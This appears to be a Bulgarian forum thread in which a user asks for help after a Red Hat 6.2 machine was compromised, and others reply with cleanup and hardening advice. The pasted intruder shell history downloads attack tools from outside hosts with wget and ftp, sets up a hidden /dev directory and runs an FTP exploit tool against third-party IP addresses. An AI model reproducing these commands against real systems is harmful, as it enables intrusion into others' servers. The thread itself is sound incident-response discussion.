Zdravejte,
 Imam nujda ot pomosht i tyrsia otgovori na iakolko vyprosa
na s koito ne moga da se spravia sama.

 Predi okolo mesec si pusnah kabelen internet, i tyj kato
 tova mi beshe neshto kato "detska mechta" - vednaga podkarah
na ednin star Pentium na 188 Mhz RedHat 6.2.
 Spriah pochti vsichko s izkliuchenie na
 DNS,http,Authentication service na port 113 /NE ZNAM KAK DA
GO SPRA/, i kachih SSH2-non comersial version.
 Configurirah go da rutira vsichko praz nego i s ipchains
maskirah localnite adresi.
 Kompiutyra raboti taka v prodyljenie na mesec kato az
 chat-pat vlizah za da pocykam (opitvah da si podkaram
multi-ruter-trafo-grafer(ne sym)) ... i taka.
Predi dva dena se lognah i ostanovih che imam mail !!!
tochnia text ne moga da kaja ..
//za syjalenie dokato chovyrkah sym zatrila mbox-a//
..no beshe neshto svyrzano s err pri logratate
 zapochnah da se chudia i da "rychkam" za da ustanovia
 prichinata.. i se natyknah na stranni "pisania" v
history-to:

  789  exit
********* 
  790  cd /dev/hpd
  791  cd /dev/hpd
  792  cd /dev
  793  mkdir hpd
  794  cd hpd
  795  ls
  796  ftp lordice.ro
  797  ls
  798  tar -zvf 1.tar.gz
  799  tar -xvf 1.tar.gz
  800  tar -xf 1.tar.gz
  801  tar -zxvf 1.tar.gz
  802  ls
  803  tar -zf 1.tar.gz
  804  tar --help
  805  tar -tvf 1.tar.gz
  806  rm -rf 1.tar.gz
  807  wget folositoare.go.ro/1.tar.gz
  808  ftp 65.126.126.199
  809  ftp 193.231.236.41
  810  ftp 193.231.236.41
  811  wget imperr.home.ro/darkbot-6f6-r6_tar.tar
  812  ftp blabla.com
  813  ftp alyla.net
  814  ls
  815  tar -xzvf  darkbot-6f6-r6_tar.tar
  816  cd darkbot6f6/
  817  ls
  818  cd dat
  819  ls
  820  cd ..
  821  cd docs
  822  ls
  823  pico README
  824  cd ..
  825   cd../
  826  pico
  827  cd ..
  828  ls
  829  rm -rf bitchbot-1_0_2_tar.tar  darkbot6f6
  830  rm -rf darkbot-6f6-r6_tar.tar
  831  tar -xzvf superwu.tar.gz
  832  cd super-wu
  833  ./superwu  64.18.125.90 21
  834  ./superwu 64.244.71.19 21
  *******
  835  cd /mnt/cdrom
  ...
   kakto mojesh da si predstavish uchudvaneto mi beshe super
goliamo...


s enda 'last' command ustanovih che ima zapisi ot roda
**
 ftp      ftpd12124    pD9514DE2.dip.t- Tue Nov  5 14:50 -
14:53  (00:03)
 ftp      ftpd1645     telehouse-103-1- Fri Nov  8 09:39 -
09:40  (00:00)
 ftp      ftpd1276     206.48.88.103    Wed Nov  6 14:10 -
down   (03:12)
 ftp      ftpd872      160.40.15.54     Wed Nov  6 02:07 -
down   (15:16)
**
:)) .. ADOVA RABOTA ..
 dokopah se do 'superwu' i pri startiranetpo mi iska
password
 v edna ot poddirectoriite otkrih 'README' v koeto pishe
samo!!:
password:wegotelectricstyle
seshtash se che ia napisah ... i mi se poiavi
"Ask Electricy members for this" 
 ps -A ne mi raboi / lipsvat hiliadi logove / i kakvo li
oshte ne
ot togava gi tyrsia i ne znam kakvo da pravia.

Obshto vzeto tova e. Razchitam na niakakvo mnenie i support

Pozdravi Eureka

 Sled podobni izjiviavania 100% sigurnost nyama. Az pone ne
bih bil siguren, che ne sum propusnal neshto. 
 Moya suvet e sled kato i bez drugo mashinata ne pravi nishto
 osven da marshrutizira/maskira trafik da formatirash diska i
 da preinstalirash. Spri DNS-a ( ne vijdam zashto da raboti
 ako ne go polzvash po prednaznachenie). Spri httpd-to ako ne
 se izpolzva, izpolzvai tcp wraper i ogranichi ssh vruzkite.
Sushtia efekt mojesh da postignesh i s iptables/ipchains

 Za da spresh Authentication service e dostatuchno da spresh
identd.

 Ima edno obshto pravilo, koeto vurshi rabota pri
 ustanoviavane na minimalno neobhodimite services -
 zabraniava se vsichko i sled tova spored nujdite zapochvash
da puskash _SAMO_ tova, bez koeto ne moje :)
 V obshtia sluchai tova e dostatuchno, a i dava vuzmojnost da
 se oburne pobveche vnimanie na sravnitelno malko
 konfiguracii i da se izbegnat chast ot eventualnite problemi
 sus sigurnostta, duljashti se na nepravilno konfigurirani
(ili izobshto nekonfigurirani) podsystemi.

Ako chetete tova znachi ne se otegchavate lesno :)

 prav e choveka ot prednia post - zabraniavash vsichko i
 puskash samo tova keoto naistina ne ti triabva - suveta si
struva cenata v zlato :)

 mnogo interesen posting vupreki che iavno e imalo hack -
 liubopitno mi e dali hacka e sprial s router mashinata ili e
pluznal i po vutreshnata mreja

 a dokolkoto niama ps i drugi podobni - ami sigurno sa gi
 podmenili s tehni si binaries no v tozi sluchai ps bi
 triabvalo da ima ps samo deto niama da pokazva istinskata
kartinka :)
 moje da sa polzvali i niakoi rootkit za rabotata - t.e.
 avtomatizirani skriptcheta deto triai/promeniat log filove i
 podmeniat binary programki kato ps i red oshte drugi neshta
...

 vij na tozi adres za razni programki koito bi triabvalo da
 napraviat "autopsia" na hacknatata mashinka i da kajat kakvo
e stanalo :
http://atstake.com/research/tools/index.html#forensic

 p.s. mnogo interesen post - pishi ako ima oshte novi momenti
:)

10x mnogo za byrzite otgovori.
   Otnosno syveta za preinstalaciata ... tova e iasno, no mi
 se shte da razbera kakvo tochno mi se e sluchilo, a ne da
preinstaliram prez mesec naprimer.
 Misleh si za promianata na logovete ... zashto sa ostavili
history-to ?!?!? 

A otnosno razvitieto .. 
 Preglejdah cron tablicite i otkrih che na vsiaka 15 min ot
chasa se startira sendmail na port 465 - ssmpt 
 sled kato go "ulovih" - //hvanah go vliuchen // i iztrelia
23b se izkliuchi i taka do sledvashtite 15 min.. 
 Osven tova pregeldah logovete na drug kopiutyr v mrejata
 kojto e s RedHat 8 i sedi neprekysnato vkliuchen ... ima
okolo hiliada greshki koito se pyrvi pyt vijdam:
 Uninhibited service  - Access deny

 Tova e utre mislia da preinstaliram  i da go napravia PC-to
samo da rutira //vse edno go niama// :(( 
Iavo triabva da ponablegna na firewall-inga

10x mnogo za url-to  

Eureka

Npravo nastryhvam !!!
Tochno dokato pisah predishnia post na port 32553 - otkrih 
SSH-1.5-1.2.27 

 dokato instalirash linux-a procheti knigata Securing and
 Optimizing Linux - Redhat Edition (primerite sa za
redhat6.2)
 sled kato konfigurirash s-mata po knigata (i kato mislish
razbira se) nqma da imash problemi.
saita e http://www.linuxdoc.org

 iavno ili sa nachinaeshti ili ne sa se setili ili gi murzi i
 ne predpolagat che usera deto e hackant e tolko napred s
materiala che da si proveriava log filove i tn .. :)
 neznam ... no kakto kazvash ti e nai dobre edin zdrav analiz
 da mu hvurlish na celia proces a to preinstalaciata
nai-lesno :)
moje da sa polzvali niakoi exploit na servicite .... 

moje da se porazrovish na 
http://www.securityfocus.com/
 search -> bugtraq - da vidish ima li i kakvi exploits za
redhat 6.2


 ako ne sa mnogo kritichni mashinkite i mojesh da gi
 poostavish niakoi i drug den i samo da nabluidavash kakvo
praviat shte e super ;) 

opitai ettercap :)
http://ettercap.sourceforge.net/index.php?s=home

 I Nikoga ama NIKOGA ne zabraviai da proveriavash i da si
 slagash security pachovete koito izlizat za saotvetnoto
 distro! Ot puskaneto na RH6.2 nasam sigurno sa izlezli
stotici fix-ove.

Mnogo mi e chudno, koi e toq "haker" koito shte napishe:
....
804  tar --help
.... 
 Za mene tova e nqkakyv neuk tip, koito e zarbral po nqkakyv
 nachin nqkoq druga parola i si e pravil opiti bez da se
 pritesnqva mngo mnogo, che moje da go hvanat, taka che,
 predi da zakliuchish, che nqkoi e "probil" po nqkakyv nachin
ot vynka, se ogledai okolo tebe

Както казаха колегите: някой се е подиграл с теб.
За следващия път ще знаеш какво не трябва да се прави.
Ident се спира  с '#' в /etc/inetd.conf + kill -HUP inetd
 На www.porcupine.org Виетцето Венема е сложил свои
разработки.  Виж
ftp://ftp.porcupine.org/pub/security/index.html
 Живей здравословно, следвай Bugtraq+updates, спортувай с
гаджето си и всичко ще е наред.

По-скоро прилича на безнаказано шетане из системата. Побързай да си 
смениш паролата за root с някоя по-трудна (да има букви, цифри, малки и 
големи букви, и специални знаци от сорта на &, $ и т.н.), коментирай всички 
редове в /etc/inetd.conf и се позамисли кой има информация за акаунтите 
на компютъра. Действително, "хакер", който от 6-ия път не може да 
разархивира един обикновен  tar-архив, по-скоро и сам не знае какво 
прави. Да не говорим за "слонските стъпки" в history-то.
Относно подмяната на ps и т.н., виж дали няма някакви промени в
проментилавата PATH на твоя профил. Може просто да стартираш някой
троянски кон от някоя друга директория, а не от подразбиращата се 
/usr/bin. Все пак, имай предвид, че ако това се е случило, нищо чудно да ти
знаят root-паролата, освен ако и самият "хакер" не си давас метка какво
прави, а просто изпълнява сляпо някакви "хакерски трикове".
Не ми се вярва да има някакви поражения в системата. Но това не ти пречи 
да си  пуснеш TCP wrappers (tcpd). Ако все пак се решиш на преинсталация, 
след като направиш чистата инсталация, си пусни Tripwire. След това ще ти 
е лесно да проследиш какви промени са направени върху системата без 
твое знание.
И наистина, защо не се откажеш от тази "антична" версия на RH?

 Znachi kakto kaza nqkoi po-gore dobre shte e da sledish
 securityfocus -> bugtraq za exploits i dr takiva nestica,
 oshte poveche che tam si pishe i koi sistemi sa uiazvimi i
eventualno reshenie na problema.

 Po sushtestvo: tova koeto e svalil vzlomadjiqta se naricha
 "autoroot"-er. Tova sa novo pokolenie rootkits, napraveni ot
 crackerite za da si ulesnqt 'zanimaniqta'. Mejdu druguto
 tochno na foruma na securityfocus imashe interesni postingi
otnosno tezi autoroot-eri.
 Tova koeto se vijda ot historito e che tozi nqkoi e vlqzul v
 tvoito pc i sled tova e svalil ot ftp server samiq rootkit
 (ftp-to kakto vsichki vijdat se hostva qvno ot nashite
 susedi ".ro" a i da si priznaq i az ot rumunski serveri sum
 teglil takiva autoroot-eri da vidq i az shto za chudo
predstavlqvat).

 Otnosno mnenieto na Nikola Antonov, moite uvajeniq kum vas,
 no probvaite da svalite edin takuv .tar i ako go
 razarhivirate ot purviq put imate cherpa ot men - izrazqvam
 lichno mnenie. Prosto samite arhivi se razarhivirat po
 tochno opredelena podredba na opciite na 'tar', zatova i
 suotvetniq 'hacker' sled kato e probval nqkolko puti da go
 untar-ne se e vidql qvno v chudo za da napishe 'tar -help'
:)))

Bye i sus zdrave

ei sa i az idvam.mnogo mi e interesno no nishto ne 
razbiram... 
Izchakaite malko da ponaucha neshto i moga i az da pomogna 
:))))